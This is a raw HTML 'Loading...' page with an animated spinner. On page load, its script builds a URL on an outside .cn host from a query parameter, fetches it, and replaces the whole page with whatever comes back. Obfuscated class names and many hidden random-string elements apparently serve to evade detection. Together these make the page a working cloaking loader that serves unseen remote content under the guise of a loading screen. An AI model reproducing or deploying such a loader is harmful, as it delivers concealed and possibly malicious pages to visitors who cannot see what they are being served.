<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qcOC4A2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qcOC4A2 .h2Tm2HwT8sv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qcOC4A2 .content {
            line-height: 50px;
            text-align: center
        }

        .qcOC4A2 .img {
            width: 100%
        }

        .qcOC4A2 .WNhIq9KRi4 {
            text-align: center
        }

        .qcOC4A2 .WNhIq9KRi4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qcOC4A2 .WNhIq9KRi4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qcOC4A2 .WNhIq9KRi4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qcOC4A2 .WNhIq9KRi4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qcOC4A2 .WNhIq9KRi4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qcOC4A2 .WNhIq9KRi4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qcOC4A2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UQKZ1RXT3z(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Bmr5jHp = UQKZ1RXT3z('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Bmr5jHp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Bmr5jHp +".html?a=share";
		}
		
        tOn3Ggd49=url+"#"+new Date().getTime();
        tOn3Ggd49 && function() {
            $.get(tOn3Ggd49, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >nNWH0y6pn00DHiIOTKwPcKe6lay7cFNq</h1>
<a  href='#' style='display:none'>sLUPbR7zoxidzs3u7DNgtQL2pLpJKKoTS</a>
<li style='display:none' >nZNLny0Xnw6oFKVkteyrHAGz</li>
<b style='display:none' >fDIuBZxmJIyQEIcqChtDFaI5KXzoDJD88g0RF4ymZa6L0AyWVCzNI57VhXlJD</b>
<span style='display:none'>TT10RBe4qfvujZ99TL2BGvnnZtlfwcbKIw1fcQhYrZNTqd6DjqOz5HmOjD7tVfhQxYhyoOBKC5T67su0KnTp0QgYX972z0QdjHj9E</span>
<b style='display:none' >fDIuBZxmJIyQEIcqChtDFaI5KXzoDJD88g0RF4ymZa6L0AyWVCzNI57VhXlJD</b>
<a  href='#' style='display:none'>sLUPbR7zoxidzs3u7DNgtQL2pLpJKKoTS</a>
<h1 style='display:none' >nNWH0y6pn00DHiIOTKwPcKe6lay7cFNq</h1><div class="qcOC4A2">
    <div class="h2Tm2HwT8sv">
        <div class="WNhIq9KRi4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>rVphPIZdPVJ3cZaEXGMcJnEuBKriN</span>
<a  href='#' style='display:none'>nRfAlXwziv3rrY22MnsvhS2qKluzbqD1Zt08GwtePhaT1Q1h0EQaSS0IK8H0Q1hL6ePEFWAyHgpP5KJSNhtdBKCmLKEyej6TX</a>
<ul style='display:none' >bbYQnaRL8hX1THiqIXs8G4dF2WXK7bbnbv0dMFcOd1DNDRhGN89lngDcRkqnovHmIM18bl9N9WMt63</ul>
<a  href='#' style='display:none'>nRfAlXwziv3rrY22MnsvhS2qKluzbqD1Zt08GwtePhaT1Q1h0EQaSS0IK8H0Q1hL6ePEFWAyHgpP5KJSNhtdBKCmLKEyej6TX</a>
<p  style='display:none'>GCv7DiELGjrT1ndD1Hh1y1pzng8WYnuQ</p>
<p  style='display:none'>GCv7DiELGjrT1ndD1Hh1y1pzng8WYnuQ</p>
<b style='display:none' >AyKvQYRHydcx4UGWomfDor2u0wttPSWFZGewmn00</b></body>
</html>